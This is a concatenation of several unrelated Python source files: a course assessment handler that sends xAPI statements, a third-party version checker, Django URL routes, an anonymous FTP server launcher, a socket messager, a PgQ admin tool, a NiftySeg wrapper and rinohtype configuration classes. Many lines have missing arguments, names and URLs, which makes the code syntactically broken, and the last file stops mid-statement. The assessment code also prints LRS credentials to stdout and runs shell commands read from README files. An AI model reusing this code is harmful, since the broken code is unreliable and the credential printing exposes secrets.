15 values
1 class
2 classes
2 classes
1 class
# Copyright 2012 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Classes and methods to manage all aspects of student assessments.""" __author__ = ' (Philip Guo)' import datetime import logging import httplib, urllib, logging, base64 from utils import BaseHandler from utils import HUMAN_READABLE_DATETIME_FORMAT import json, uuid, os import urllib2 import base64 from controllers import lessons from models import courses from models import models from models import review from models import student_work from models import transforms from models import utils from models.models import Student from models.models import StudentAnswersEntity from tools import verify from google.appengine.ext import db def store_score(course, student, assessment_type, score): """Stores a student's score on a particular assessment. Args: course: the course containing the assessment. student: the student whose data is stored. assessment_type: the type of the assessment. score: the student's score on this assessment. Returns: the result of the assessment, if appropriate. """ # FIXME: Course creators can edit this code to implement custom # assessment scoring and storage behavior # TODO(pgbovine): Note that the latest version of answers are always saved, # but scores are only saved if they're higher than the previous attempt. # This can lead to unexpected analytics behavior. Resolve this. existing_score = course.get_score(student, assessment_type) # remember to cast to int for comparison if (existing_score is None) or (score > int(existing_score)) or (1>0): utils.set_score(student, assessment_type, score) ## Aqui deberiamos crear nuestro json tincan_activity_uri = os.environ.get('HTTP_REFERER', 'urn:uuid:' + str(uuid.uuid4())) Xapi_statement = { "id": "12345678-1234-5678-1234-567812345678", "actor":{ "mbox":"mailto:"+student.key().name() }, "verb":{ "id":"", "display":{ "en-US":"created" } }, "object":{ "id" : tincan_activity_uri, "definition": { "name":{ "en-US": "Multiquiz" }, "description": { "en-US": "multipart activity description" } }, }, 'result': { 'completion': True, 'score': { 'scaled': 0 } } } statement=json.dumps(Xapi_statement) print(statement) print( '%(LRS_USERNAME)s:%(LRS_PASSWORD)s' % os.environ) connection = httplib.HTTPConnection("") connection.request('POST', "/xapi/statements", statement, { 'x-experience-api-version': '1.0', 'Authorization': 'Basic ' + base64.b64encode('%(LRS_USERNAME)s:%(LRS_PASSWORD)s' % os.environ), 'content-type': 'application/json', }) response = connection.getresponse() print ('%s %s' % (response.status, response.reason), connection.close() # response = http.request('POST', 'http:', body=statement) # webapp.request('http:', 'POST', statement, {'content-type': 'application/json'}) #response_stream = urllib2.urlopen(req)'http:', payload=json.dumps(statement)) class AnswerHandler(BaseHandler): """Handler for saving assessment answers.""" # Find student entity and save answers @db.transactional(xg=True) def update_assessment_transaction( self, email, assessment_type, new_answers, score): """Stores answer and updates user scores. Args: email: the student's email address. assessment_type: the title of the assessment. new_answers: the latest set of answers supplied by the student. score: the numerical assessment score. Returns: the student instance. """ student = Student.get_enrolled_student_by_email(email) course = self.get_course() # It may be that old Student entities don't have user_id set; fix it. if not student.user_id: student.user_id = self.get_user().user_id() answers = StudentAnswersEntity.get_by_key_name(student.user_id) if not answers: answers = StudentAnswersEntity(key_name=student.user_id) answers.updated_on = utils.set_answer(answers, assessment_type, new_answers) store_score(course, student, assessment_type, score) student.put() answers.put() # Also record the event, which is useful for tracking multiple # submissions and history. models.EventEntity.record( 'submit-assessment', self.get_user(), transforms.dumps({ 'type': 'assessment-%s' % assessment_type, 'values': new_answers, 'location': 'AnswerHandler'})) return student def get(self): """Handles GET requests. This method is here because if a student logs out when on the reviewed_assessment_confirmation page, that student is redirected to the GET method of the corresponding handler. It might be a good idea to merge this class with lessons.AssessmentHandler, which currently only has a GET handler. """ self.redirect('/course') # pylint: disable=too-many-statements def post(self): """Handles POST requests.""" student = self.personalize_page_and_get_enrolled() if not student: return if not self.assert_xsrf_token_or_fail(self.request, 'assessment-post'): return course = self.get_course() assessment_type = self.request.get('assessment_type') if not assessment_type: self.error(404) logging.error('No assessment type supplied.') return unit = course.find_unit_by_id(assessment_type) if unit is None or unit.type != verify.UNIT_TYPE_ASSESSMENT: self.error(404) logging.error('No assessment named %s exists.', assessment_type) return self.template_value['navbar'] = {'course': True} self.template_value['assessment'] = assessment_type self.template_value['assessment_name'] = unit.title self.template_value['is_last_assessment'] = ( course.is_last_assessment(unit)) self.template_value['unit_id'] = unit.unit_id # Convert answers from JSON to dict. answers = self.request.get('answers') answers = transforms.loads(answers) if answers else [] grader = unit.workflow.get_grader() # Scores are not recorded for human-reviewed assignments. score = 0 if grader == courses.AUTO_GRADER: score = int(round(float(self.request.get('score')))) # Record assessment transaction. student = self.update_assessment_transaction( student.key().name(), assessment_type, answers, score) if grader == courses.HUMAN_GRADER: rp = course.get_reviews_processor() # Guard against duplicate submissions of a human-graded assessment. previously_submitted = rp.does_submission_exist( unit.unit_id, student.get_key()) if not previously_submitted: # Check that the submission due date has not passed. time_now = submission_due_date = unit.workflow.get_submission_due_date() if time_now > submission_due_date: self.template_value['time_now'] = time_now.strftime( HUMAN_READABLE_DATETIME_FORMAT) self.template_value['submission_due_date'] = ( submission_due_date.strftime( HUMAN_READABLE_DATETIME_FORMAT)) self.template_value['error_code'] = ( 'assignment_deadline_exceeded') self.render('error.html') return submission_key = student_work.Submission.write( unit.unit_id, student.get_key(), answers) rp.start_review_process_for( unit.unit_id, submission_key, student.get_key()) # Record completion event in progress tracker. course.get_progress_tracker().put_assessment_completed( student, assessment_type) self.template_value['previously_submitted'] = previously_submitted matcher = unit.workflow.get_matcher() self.template_value['matcher'] = matcher if matcher == review.PEER_MATCHER: self.template_value['review_dashboard_url'] = ( 'reviewdashboard?unit=%s' % unit.unit_id ) self.render('reviewed_assessment_confirmation.html') return else: # Record completion event in progress tracker. course.get_progress_tracker().put_assessment_completed( student, assessment_type) # Save the submission in the datastore, overwriting the earlier # version if it exists. submission_key = student_work.Submission.write( unit.unit_id, student.get_key(), answers) course.update_final_grades(student) parent_unit = course.get_parent_unit(unit.unit_id) if parent_unit: unit_contents = lessons.UnitHandler.UnitLeftNavElements( course, parent_unit) next_url = unit_contents.get_url_by( 'assessment', unit.unit_id, 0) + '&confirmation' self.redirect('/' + next_url) else: self.template_value['result'] = course.get_overall_result( student) self.template_value['score'] = score self.template_value['overall_score'] = course.get_overall_score( student) self.render('test_confirmation.html')
#!/usr/bin/python2.5 # Copyright 2009 Google Inc. # # Licensed under the Apache License, Version 2.0 (the 'License') # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Author (Stephen Lamm) import logging import os import re import subprocess def GetSubversionExternals(): subversion_externals = [] svn_cmd = ['svn', 'propget', 'svn:externals', '.'] output = subprocess.Popen(svn_cmd, stdout=subprocess.PIPE).communicate()[0] for external_entry in output.splitlines(): if external_entry: local_path, svn_url = external_entry.split() if local_path.startswith('third_party/'): subversion_externals.append((local_path, svn_url)) return dict(subversion_externals) def GetThirdPartyDirectoriesToCheck(ignore_dirs): ignore_dirs = set(ignore_dirs) ignore_dirs.add('third_party/.svn') check_dirs = [] for third_party_dir in os.listdir('third_party'): relative_dir = 'third_party/%s' % third_party_dir if (relative_dir not in ignore_dirs and os.path.isdir(relative_dir)): check_dirs.append(relative_dir) return check_dirs def CheckVersion(third_party_dir): readme_file = open(os.path.join(third_party_dir, 'README.browserscope')) print '--------------------------------------------------' print 'Checking directory: %s' % third_party_dir for line in readme_file.readlines(): line.strip() match = re.match( r'(VERSION|CHECK_VERSION|CHECK_VERSION_MANUALLY|URL):\s*(.*)', line) if match: readme_key, value = match.groups() if readme_key == 'URL': print 'URL: %s' % value elif readme_key == 'VERSION': print 'Local version: %s' % value elif readme_key == 'CHECK_VERSION': print 'Remote version:', print subprocess.Popen( value, shell=True, stdout=subprocess.PIPE).communicate()[0].strip() else: print 'Check manually: %s' % value print if __name__ == '__main__': if 'third_party' not in os.listdir('.'): os.chdir('..') if 'third_party' not in os.listdir('.'): logging.error('Must run from the application root.') subversion_externals = GetSubversionExternals() for skipping_dirs in sorted(subversion_externals.keys()): print "Skipping directory managed by svn:externals: %s" % skipping_dirs check_dirs = GetThirdPartyDirectoriesToCheck(subversion_externals.keys()) for third_party_dir in check_dirs: CheckVersion(third_party_dir)
from django.conf.urls import patterns, include, url from django.contrib import admin from Small import views from .views import * from django.contrib.staticfiles.urls import staticfiles_urlpatterns #from core.views import shop from django.contrib.staticfiles.urls import staticfiles_urlpatterns from core.views import shop from django.conf import settings admin.autodiscover() urlpatterns = patterns('', url(r'^admin/', include(, url(r'^accounting/',include('accounting.urls')), url(r'^core/',include('core.urls')), #url(r'^purchase/',include('purchase.urls')), url(r'^product/',include('product.urls')), url(r'^warehouse/',include('warehouse.urls')), url(r'^procurement/',include('procurement.urls')), # url(r'^fulfillment/',include('fulfillment.urls')), url(r'^$', Home.as_view(), name="home"), url(r'^index$', Home.as_view(), name="home"), url(r'^pricing$', Pricing.as_view(), name="pricing"), url(r'^services$', Services.as_view(), name="services"), url(r'^about$', About.as_view(), name="about"), url(r'^profile$', views.Profile, name='profile'), url(r'^$', Home.as_view(), name="home"), url(r'^index$', Home.as_view(), name="home"), url(r'^pricing$', Pricing.as_view(), name="pricing"), url(r'^services$', Services.as_view(), name="services"), url(r'^about$', About.as_view(), name="about"), url(r'^accounts/', include('registration.backends.default.urls')), ) urlpatterns += patterns('django.contrib.auth.views', url(r'^login/$', 'login', {'template_name': 'registration/login.html'}, name = 'login' ), url(r'^logout/$', 'logout', {'template_name': 'registration/logout.html'}, name = 'logout' ), ) urlpatterns += staticfiles_urlpatterns() if settings.DEBUG: urlpatterns += patterns('', url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT, }), )
# Copyright (C) 2007-2016 Giampaolo Rodola' <>. # Use of this source code is governed by MIT license that can be # found in the LICENSE file. """ Start a stand alone anonymous FTP server from the command line as in: $ python -m pyftpdlib """ import logging import optparse import os import sys from . import __ver__ from ._compat import getcwdu from .authorizers import DummyAuthorizer from .handlers import FTPHandler from .log import config_logging from .servers import FTPServer class CustomizedOptionFormatter(optparse.IndentedHelpFormatter): """Formats options shown in help in a prettier way.""" def format_option(self, option): result = [] opts = self.option_strings[option] result.append(' %s\n' % opts) if help_text = ' %s\n\n' % self.expand_default(option) result.append(help_text) return ''.join(result) def main(): """Start a stand alone anonymous FTP server.""" usage = "python -m pyftpdlib [options]" parser = optparse.OptionParser(usage=usage, description=main.__doc__, formatter=CustomizedOptionFormatter()) parser.add_option('-i', '--interface', default=None, metavar="ADDRESS", help="specify the interface to run on (default all " "interfaces)") parser.add_option('-p', '--port', type="int", default=2121, metavar="PORT", help="specify port number to run on (default 2121)") parser.add_option('-w', '--write', action="store_true", default=False, help="grants write access for the anonymous user " "(default read-only)") parser.add_option('-d', '--directory', default=getcwdu(), metavar="FOLDER", help="specify the directory to share (default current " "directory)") parser.add_option('-n', '--nat-address', default=None, metavar="ADDRESS", help="the NAT address to use for passive connections") parser.add_option('-r', '--range', default=None, metavar="FROM-TO", help="the range of TCP ports to use for passive " "connections (e.g. -r 8000-9000)") parser.add_option('-v', '--version', action='store_true', help="print pyftpdlib version and exit") parser.add_option('-V', '--verbose', action='store_true', help="activate a more verbose logging") options, args = parser.parse_args() if options.version: sys.exit("pyftpdlib %s" % __ver__) if options.verbose: config_logging(level=logging.DEBUG) passive_ports = None if options.range: try: start, stop = options.range.split('-') start = int(start) stop = int(stop) except ValueError: parser.error('invalid argument passed to -r option') else: passive_ports = list(range(start, stop + 1)) # On recent Windows versions, if address is not specified and IPv6 # is installed the socket will listen on IPv6 by default; in this # case we force IPv4 instead. if in ('nt', 'ce') and not options.interface: options.interface = '' authorizer = DummyAuthorizer() perm = options.write and "elradfmwM" or "elr" authorizer.add_anonymous(, perm=perm) handler = FTPHandler handler.authorizer = authorizer handler.masquerade_address = options.nat_address handler.passive_ports = passive_ports ftpd = FTPServer((options.interface, options.port), FTPHandler) try: ftpd.serve_forever() finally: ftpd.close_all() if __name__ == '__main__': main()
pi side/
# Trades messages with a remote host/client # Essentially provides a layer to transform generic socket datastreams # into messages (strings) with messagetypes # Messagetype will be used to invoke a registered callback for that type # with the message content as its argument import socket import select import struct mode = "I" length_size = struct.calcsize(mode) def recv_message(sock): data = sock.recv(length_size, socket.MSG_WAITALL) if not data: return None, None msg_size = struct.unpack(mode, data)[0] messagetype = '' if msg_size > 0: messagetype = sock.recv(msg_size, socket.MSG_WAITALL) data = sock.recv(length_size, socket.MSG_WAITALL) msg_size = struct.unpack(mode, data)[0] message = '' if msg_size > 0: message = sock.recv(msg_size, socket.MSG_WAITALL) print messagetype return messagetype, message def send_message(sock, messagetype, message): try: mtl = struct.pack(mode, len(messagetype)) mcl = struct.pack(mode, len(message)) sock.sendall(mtl + messagetype + mcl + message) except socket.error, e: print 'Error sending data' print e class Messager(): def __init__(self): self.clients = [] self.callbacks = dict() self.listening = False def __del__(self): if self.listening: self.hostSock.close() for sock in clients: sock.close() def setupHost(self, address, port): self.hostSock = socket.socket() self.hostSock.bind((address, port)) self.hostSock.listen(5) self.hostSock.setblocking(0) self.listening = True def processHost(self): try: if self.listening: conn, address = self.hostSock.accept() self.clients.append(conn) except socket.timeout: pass except socket.error, e: if e[0] == 11: pass else: print e inputs, outputs, errors =, [], self.clients, 0) for sock in inputs: messagetype, message = recv_message(sock) if messagetype is None: self.clients.remove(sock) sock.close() elif messagetype in self.callbacks: self.callbacks[messagetype](sock, message) for sock in errors: self.clients.remove(sock) sock.close() # def send(self, target, messagetype, message): # pass def register(self, messagetype, callback): self.callbacks[messagetype] = callback def unregister(self, messagetype): del self.callbacks[messagetype] def connect(self, remoteHost, remotePort): # Connect to a remote host and add its socket to the client list # i.e. we don't listen for connection, but initiate it #This allows two-way communication between two messager objects sock = socket.socket() sock.connect((remoteHost, remotePort)) self.clients.append(sock) return sock
#! /usr/bin/env python """PgQ ticker and maintenance. """ import sys import skytools from pgq.ticker import SmartTicker from pgq.status import PGQStatus #from pgq.admin import PGQAdmin """TODO: pgqadm ini check """ command_usage = """ %prog [options] INI CMD [subcmd args] commands: ticker start ticking & maintenance process status show overview of queue health install install code into db create QNAME create queue drop QNAME drop queue register QNAME CONS install code into db unregister QNAME CONS install code into db config QNAME [VAR=VAL] show or change queue config """ config_allowed_list = { 'queue_ticker_max_count': 'int', 'queue_ticker_max_lag': 'interval', 'queue_ticker_idle_period': 'interval', 'queue_rotation_period': 'interval', } class PGQAdmin(skytools.DBScript): def __init__(self, args): skytools.DBScript.__init__(self, 'pgqadm', args) self.set_single_loop(1) if len(self.args) < 2: print "need command" sys.exit(1) int_cmds = { 'create': self.create_queue, 'drop': self.drop_queue, 'register': self.register, 'unregister': self.unregister, 'install': self.installer, 'config': self.change_config, } cmd = self.args[1] if cmd == "ticker": script = SmartTicker(args) elif cmd == "status": script = PGQStatus(args) elif cmd in int_cmds: script = None = int_cmds[cmd] else: print "unknown command" sys.exit(1) if self.pidfile: self.pidfile += ".admin" self.run_script = script def start(self): if self.run_script: self.run_script.start() else: skytools.DBScript.start(self) def init_optparse(self, parser=None): p = skytools.DBScript.init_optparse(self, parser) p.set_usage(command_usage.strip()) return p def installer(self): objs = [ skytools.DBLanguage("plpgsql"), skytools.DBFunction("txid_current_snapshot", 0, sql_file="txid.sql"), skytools.DBSchema("pgq", sql_file="pgq.sql"), ] db = self.get_database('db') curs = db.cursor() skytools.db_install(curs, objs, self.log) db.commit() def create_queue(self): qname = self.args[2]'Creating queue: %s' % qname) self.exec_sql("select pgq.create_queue(%s)", [qname]) def drop_queue(self): qname = self.args[2]'Dropping queue: %s' % qname) self.exec_sql("select pgq.drop_queue(%s)", [qname]) def register(self): qname = self.args[2] cons = self.args[3]'Registering consumer %s on queue %s' % (cons, qname)) self.exec_sql("select pgq.register_consumer(%s, %s)", [qname, cons]) def unregister(self): qname = self.args[2] cons = self.args[3]'Unregistering consumer %s from queue %s' % (cons, qname)) self.exec_sql("select pgq.unregister_consumer(%s, %s)", [qname, cons]) def change_config(self): if len(self.args) < 3: list = self.get_queue_list() for qname in list: self.show_config(qname) return qname = self.args[2] if len(self.args) == 3: self.show_config(qname) return alist = [] for el in self.args[3:]: k, v = el.split('=') if k not in config_allowed_list: qk = "queue_" + k if qk not in config_allowed_list: raise Exception('unknown config var: '+k) k = qk expr = "%s=%s" % (k, skytools.quote_literal(v)) alist.append(expr)'Change queue %s config to: %s' % (qname, ", ".join(alist))) sql = "update pgq.queue set %s where queue_name = %s" % ( ", ".join(alist), skytools.quote_literal(qname)) self.exec_sql(sql, []) def exec_sql(self, q, args): self.log.debug(q) db = self.get_database('db') curs = db.cursor() curs.execute(q, args) db.commit() def show_config(self, qname): fields = [] for f, kind in config_allowed_list.items(): if kind == 'interval': sql = "extract('epoch' from %s)::text as %s" % (f, f) fields.append(sql) else: fields.append(f) klist = ", ".join(fields) q = "select " + klist + " from pgq.queue where queue_name = %s" db = self.get_database('db') curs = db.cursor() curs.execute(q, [qname]) res = curs.dictfetchone() db.commit() if res is None: print "no such queue:", qname return print qname for k in config_allowed_list: n = k if k[:6] == "queue_": n = k[6:] print " %s\t=%7s" % (n, res[k]) def get_queue_list(self): db = self.get_database('db') curs = db.cursor() curs.execute("select queue_name from pgq.queue order by 1") rows = curs.fetchall() db.commit() list = [] for r in rows: list.append(r[0]) return list if __name__ == '__main__': script = PGQAdmin(sys.argv[1:]) script.start()
# -*- coding: utf-8 -*- # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: """ The niftyseg module provides classes for interfacing with `niftyseg <>`_ command line tools. These are the base tools for working with niftyseg. EM Statistical Segmentation tool is found in niftyseg/ Fill lesions tool is found in niftyseg/ Mathematical operation tool is found in niftyseg/ Patch Match tool is found in niftyseg/ Statistical operation tool is found in niftyseg/ Label Fusion and CalcTopNcc tools are in niftyseg/ Examples -------- See the docstrings of the individual classes for examples. """ from __future__ import print_function, division, unicode_literals, absolute_import from ..niftyreg.base import no_nifty_package from ..niftyfit.base import NiftyFitCommand import subprocess import warnings warn = warnings.warn warnings.filterwarnings('always', category=UserWarning) class NiftySegCommand(NiftyFitCommand): """ Base support interface for NiftySeg commands. """ _suffix = '_ns' _min_version = None def __init__(self, **inputs): super(NiftySegCommand, self).__init__(**inputs) def get_version(self): if no_nifty_package(cmd=self.cmd): return None # exec_cmd = ''.join((self.cmd, ' --version')) exec_cmd = 'seg_EM --version' # Using seg_EM for version (E.G: seg_stats --version doesn't work) return subprocess.check_output(exec_cmd, shell=True).strip('\n')
# This file is part of rinohtype, the Python document preparation system. # # Copyright (c) Brecht Machiels. # # Use of this source code is subject to the terms of the GNU Affero General # Public License v3. See the LICENSE file or import re from collections import OrderedDict from configparser import ConfigParser from io import StringIO from itertools import chain from pathlib import Path from token import NUMBER, ENDMARKER, MINUS, PLUS, NAME, NEWLINE from tokenize import generate_tokens from warnings import warn from .util import (NamedDescriptor, WithNamedDescriptors, NotImplementedAttribute, class_property, PeekIterator, cached) __all__ = ['AttributeType', 'AcceptNoneAttributeType', 'OptionSet', 'OptionSetMeta', 'Attribute', 'OverrideDefault', 'AttributesDictionary', 'Configurable', 'RuleSet', 'RuleSetFile', 'Bool', 'Integer', 'ParseError', 'Var'] class AttributeType(object): def __eq__(self, other): return type(self) == type(other) and self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other @classmethod def check_type(cls, value): return isinstance(value, cls) @classmethod def from_string(cls, string, source=None): return cls.parse_string(string, source) @classmethod def parse_string(cls, string, source): tokens = TokenIterator(string) value = cls.from_tokens(tokens, source) if next(tokens).type != ENDMARKER: raise ParseError('Syntax error') return value @classmethod def from_tokens(cls, tokens, source): raise NotImplementedError(cls) @classmethod def validate(cls, value): if isinstance(value, str): value = cls.from_string(value) if not cls.check_type(value): raise TypeError("{} is not of type {}".format(value, cls.__name__)) return value @classmethod def doc_repr(cls, value): return '``{}``'.format(value) if value else '(no value)' @classmethod def doc_format(cls): warn('Missing implementation for {}.doc_format'.format(cls.__name__)) return '' class AcceptNoneAttributeType(AttributeType): """Accepts 'none' (besides other values)""" @classmethod def check_type(cls, value): return (isinstance(value, type(None)) or super(__class__, cls).check_type(value)) @classmethod def from_string(cls, string, source=None): if string.strip().lower() == 'none': return None return super(__class__, cls).from_string(string, source) @classmethod def doc_repr(cls, value): return '``{}``'.format('none' if value is None else value) class OptionSetMeta(type): def __new__(metacls, classname, bases, cls_dict): cls = super().__new__(metacls, classname, bases, cls_dict) cls.__doc__ = (cls_dict['__doc__'] + '\n\n' if '__doc__' in cls_dict else '') cls.__doc__ += 'Accepts: {}'.format(cls.doc_format()) return cls def __getattr__(cls, item): if item == 'NONE' and None in cls.values: return None string = item.lower().replace('_', ' ') if item.isupper() and string in cls.values: return string raise AttributeError(item) def __iter__(cls): return iter(cls.values) class OptionSet(AttributeType, metaclass=OptionSetMeta): """Accepts the values listed in :attr:`values`""" values = () @classmethod def check_type(cls, value): return value in cls.values @class_property def value_strings(cls): return ['none' if value is None else value.lower() for value in cls.values] @classmethod def _value_from_tokens(cls, tokens): if != NAME: raise ParseError('Expecting a name') token = next(tokens) _, start_col = token.start while and in (NAME, MINUS): token = next(tokens) _, end_col = token.end return token.line[start_col:end_col].strip() @classmethod def from_tokens(cls, tokens, source): option_string = cls._value_from_tokens(tokens) try: index = cls.value_strings.index(option_string.lower()) except ValueError: raise ValueError("'{}' is not a valid {}. Must be one of: '{}'" .format(option_string, cls.__name__, "', '".join(cls.value_strings))) return cls.values[index] @classmethod def doc_repr(cls, value): return '``{}``'.format(value) @classmethod def doc_format(cls): return ', '.join('``{}``'.format(s) for s in cls.value_strings) class Attribute(NamedDescriptor): """Descriptor used to describe a style attribute""" def __init__(self, accepted_type, default_value, description): = None self.accepted_type = accepted_type self.default_value = accepted_type.validate(default_value) self.description = description self.source = None def __get__(self, style, type=None): try: return style.get(, self.default_value) except AttributeError: return self def __set__(self, style, value): if not self.accepted_type.check_type(value): raise TypeError('The {} attribute only accepts {} instances' .format(, self.accepted_type.__name__)) style[] = value class OverrideDefault(Attribute): """Overrides the default value of an attribute defined in a superclass""" def __init__(self, default_value): self._default_value = default_value @property def overrides(self): return self._overrides @overrides.setter def overrides(self, attribute): self._overrides = attribute self.default_value = self.accepted_type.validate(self._default_value) @property def accepted_type(self): return self.overrides.accepted_type @property def description(self): return self.overrides.description class WithAttributes(WithNamedDescriptors): def __new__(mcls, classname, bases, cls_dict): attributes = cls_dict['_attributes'] = OrderedDict() doc = [] for name, attr in cls_dict.items(): if not isinstance(attr, Attribute): continue attributes[name] = attr if isinstance(attr, OverrideDefault): for mro_cls in (cls for base_cls in bases for cls in base_cls.__mro__): try: attr.overrides = mro_cls._attributes[name] break except (AttributeError, KeyError): pass else: raise NotImplementedError battr = ':attr:`{0} <.{0}.{1}>`'.format(mro_cls.__name__, name) inherits = f' (inherited from {battr})' overrides = f' (overrides {battr} default)' else: inherits = overrides = '' doc.append('{}: {}{}'.format(name, attr.description, inherits)) format = attr.accepted_type.doc_format() default = attr.accepted_type.doc_repr(attr.default_value) doc.append('\n *Accepts* :class:`.{}`: {}\n' .format(attr.accepted_type.__name__, format)) doc.append('\n *Default*: {}{}\n' .format(default, overrides)) supported_attributes = list(name for name in attributes) documented = set(supported_attributes) for base_class in bases: try: supported_attributes.extend(base_class._supported_attributes) except AttributeError: continue for mro_cls in base_class.__mro__: for name, attr in getattr(mro_cls, '_attributes', {}).items(): if name in documented: continue doc.append('{0}: {1} (inherited from :attr:`{2} <.{2}.{0}>`)' .format(name, attr.description, mro_cls.__name__)) format = attr.accepted_type.doc_format() default = attr.accepted_type.doc_repr(attr.default_value) doc.append('\n *Accepts* :class:`.{}`: {}\n' .format(attr.accepted_type.__name__, format)) doc.append('\n *Default*: {}\n'.format(default)) documented.add(name) if doc: attr_doc = '\n '.join(chain([' Attributes:'], doc)) cls_dict['__doc__'] = (cls_dict.get('__doc__', '') + '\n\n' + attr_doc) cls_dict['_supported_attributes'] = supported_attributes return super().__new__(mcls, classname, bases, cls_dict) @property def _all_attributes(cls): for mro_class in reversed(cls.__mro__): for name in getattr(mro_class, '_attributes', ()): yield name @property def supported_attributes(cls): for mro_class in cls.__mro__: for name in getattr(mro_class, '_supported_attributes', ()): yield name class AttributesDictionary(OrderedDict, metaclass=WithAttributes): def __init__(self, base=None, **attributes): = None self.source = None self.base = base super().__init__(attributes) @classmethod def _get_default(cls, attribute): """Return the default value for `attribute`. If no default is specified in this style, get the default from the nearest superclass. If `attribute` is not supported, raise a :class:`KeyError`.""" try: for klass in cls.__mro__: if attribute in klass._attributes: return klass._attributes[attribute].default_value except AttributeError: raise KeyError("No attribute '{}' in {}".format(attribute, cls)) @classmethod def attribute_definition(cls, name): try: for klass in cls.__mro__: if name in klass._attributes: return klass._attributes[name] except AttributeError: pass raise KeyError(name) @classmethod def attribute_type(cls, name): try: return cls.attribute_definition(name).accepted_type except KeyError: raise TypeError('{} is not a supported attribute for {}' .format(name, cls.__name__)) @classmethod def get_ruleset(self): raise NotImplementedError class DefaultValueException(Exception): pass class Configurable(object): configuration_class = NotImplementedAttribute() def configuration_name(self, document): raise NotImplementedError def get_config_value(self, attribute, document): ruleset = self.configuration_class.get_ruleset(document) return ruleset.get_value_for(self, attribute, document) class BaseConfigurationException(Exception): def __init__(self, base_name): = base_name class Source(object): """Describes where a :class:`DocumentElement` was defined""" @property def location(self): """Textual representation of this source""" return repr(self) @property def root(self): """Directory path for resolving paths relative to this source""" return None class RuleSet(OrderedDict, Source): main_section = NotImplementedAttribute() def __init__(self, name, base=None, source=None, **kwargs): super().__init__(**kwargs) = name self.base = base self.source = source self.variables = OrderedDict() def contains(self, name): return name in self or (self.base and self.base.contains(name)) def find_source(self, name): """Find top-most ruleset where configuration `name` is defined""" if name in self: return if self.base: return self.base.find_source(name) def get_configuration(self, name): try: return self[name] except KeyError: if self.base: return self.base.get_configuration(name) raise def __setitem__(self, name, item): assert name not in self if isinstance(item, AttributesDictionary): # FIXME self._validate_attributes(name, item) super().__setitem__(name, item) def __call__(self, name, **kwargs): self[name] = self.get_entry_class(name)(**kwargs) def __repr__(self): return '{}({})'.format(type(self).__name__, def __str__(self): return repr(self) def __bool__(self): return True RE_VARIABLE = re.compile(r'^\$\(([a-z_ -]+)\)$', re.IGNORECASE) def _validate_attributes(self, name, attr_dict): = name attr_dict.source = self for key, val in attr_dict.items(): attr_dict[key] = self._validate_attribute(attr_dict, key, val) def _validate_attribute(self, attr_dict, name, value): attribute_type = attr_dict.attribute_type(name) if isinstance(value, str): stripped = value.replace('\n', ' ').strip() m = self.RE_VARIABLE.match(stripped) if m: return Var( value = self._attribute_from_string(attribute_type, stripped) elif hasattr(value, 'source'): value.source = self if not isinstance(value, Var) and not attribute_type.check_type(value): raise TypeError("{} ({}) is not of the correct type for the '{}' " "attribute".format(value, type(value).__name__, name)) return value @cached def _attribute_from_string(self, attribute_type, string): return attribute_type.from_string(string, self) def get_variable(self, configuration_class, attribute, variable): try: value = self.variables[] except KeyError: if not self.base: raise VariableNotDefined("Variable '{}' is not defined" .format( return self.base.get_variable(configuration_class, attribute, variable) return self._validate_attribute(configuration_class, attribute, value) def get_entry_class(self, name): raise NotImplementedError def _get_value_recursive(self, name, attribute): if name in self: entry = self[name] if attribute in entry: return entry[attribute] elif isinstance(entry.base, str): raise BaseConfigurationException(entry.base) elif entry.base is not None: return entry.base[attribute] if self.base: return self.base._get_value_recursive(name, attribute) raise DefaultValueException @cached def get_value(self, name, attribute): try: return self._get_value_recursive(name, attribute) except BaseConfigurationException as exc: return self.get_value(, attribute) def _get_value_lookup(self, configurable, attribute, document): name = configurable.configuration_name(document) return self.get_value(name, attribute) def get_value_for(self, configurable, attribute, document): try: value = self._get_value_lookup(configurable, attribute, document) except DefaultValueException: value = configurable.configuration_class._get_default(attribute) if isinstance(value, Var): configuration_class = configurable.configuration_class value = self.get_variable(configuration_class, attribute, value) return value class RuleSetFile(RuleSet): def __init__(self, filename, base=None, source=None, **kwargs): self.filename = self._absolute_path(filename, source) config = ConfigParser(default_section=None, delimiters=('=',), interpolation=None) with as file: config.read_file(file) options = dict(config[self.main_section] if config.has_section(self.main_section) else {}) name = options.pop('name', filename) base = options.pop('base', base) options.update(kwargs) # optionally override options super().__init__(name, base=base, source=source, **options) if config.has_section('VARIABLES'): for name, value in config.items('VARIABLES'): self.variables[name] = value for section_name, section_body in config.items(): if section_name in (None, self.main_section, 'VARIABLES'): continue if ':' in section_name: name, classifier = (s.strip() for s in section_name.split(':')) else: name, classifier = section_name.strip(), None self.process_section(name, classifier, section_body.items()) @classmethod def _absolute_path(cls, filename, source): file_path = Path(filename) if not file_path.is_absolute(): if source is None or source.root is None: raise ValueError('{} path should be absolute: {}' .format(cls.__name__, file_path)) file_path = source.root / file_path return file_path @property def location(self): return str(self.filename.resolve()), None, None @property def root(self): return self.filename.parent.resolve() def process_section(self, section_name, classifier, items): raise NotImplementedError class Bool(AttributeType): """Expresses a binary choice""" @classmethod def check_type(cls, value): return isinstance(value, bool) @classmethod def from_tokens(cls, tokens, source): string = next(tokens).string lower_string = string.lower() if lower_string not in ('true', 'false'): raise ValueError("'{}' is not a valid {}. Must be one of 'true' " "or 'false'".format(string, cls.__name__)) return lower_string == 'true' @classmethod def doc_repr(cls, value): return '``{}``'.format(str(value).lower()) @classmethod def doc_format(cls): return '``true`` or ``false``' class Integer(AttributeType): """Accepts natural numbers""" @classmethod def check_type(cls, value): return isinstance(value, int) @classmethod def from_tokens(cls, tokens, source): token = next(tokens) sign = 1 if token.exact_type in (MINUS, PLUS): sign = 1 if token.exact_type == PLUS else -1 token 